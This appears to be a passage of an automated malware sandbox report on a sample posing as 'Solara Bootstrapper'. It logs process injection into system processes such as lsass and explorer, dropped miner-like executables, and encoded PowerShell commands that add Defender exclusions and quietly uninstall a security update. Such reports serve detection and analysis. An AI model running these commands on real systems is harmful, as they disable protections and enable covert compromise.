Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DBFA550000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 3050000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2364AE20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19AF2590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 232885B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C3732E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EB58D40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 29DD77B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19A497D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C510000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB883E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB88E70000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 1028 base: 3050000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Thread register set: target process: 7504			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Thread register set: target process: 7464

Writes to foreign memory regions

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1E858980000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 140ADFC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195DD590000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1160CB90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 257E1070000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 254A27C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A205670000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26238950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2786E560000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1611FF70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C0F350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B279570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E70A460000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22D13110000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C8C580000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C782530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: A60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24066EB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A142790000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 195B6F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DAD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DBFA550000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A239D90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17CFA390000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FB7270000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 164E88A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 25177B50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28D5D340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20859990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F153C20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D241D40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15204DB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 3050000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 175C5280000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13E5E930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 27234C50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28543540000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 2B684340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2364AE20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19AF2590000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 232885B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1C3732E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EB58D40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 29DD77B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19A497D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C510000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB883E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1AB88E70000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1428DD00000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C220000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F43C230000

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkadqbiacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahyacqb3acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqabqb4acmapgagac0argbvahiaywblacaapaajagiazgbpacmapga="
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="
Source: C:\Users\user\Desktop\Solara Bootstrapper.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagkadqbiacmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajahyacqb3acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajagqabqb4acmapgagac0argbvahiaywblacaapaajagiazgbpacmapga="	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagqacab0acmapgbbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajageacab0acmapgagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaeaakaakaguabgb2adoavqbzaguacgbqahiabwbmagkabablacwajablag4adga6afmaeqbzahqazqbtaeqacgbpahyazqapacaapaajag4aagbnacmapgagac0argbvahiaywblacaapaajaggabgbxacmapga="	Jump to behavior

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

46_2_0000000140001B54

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

46_2_0000000140001B54

Source: C:\Windows\System32\conhost.exe

Code function: 2_2_0000019A497E36F0 cpuid

2_2_0000019A497E36F0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
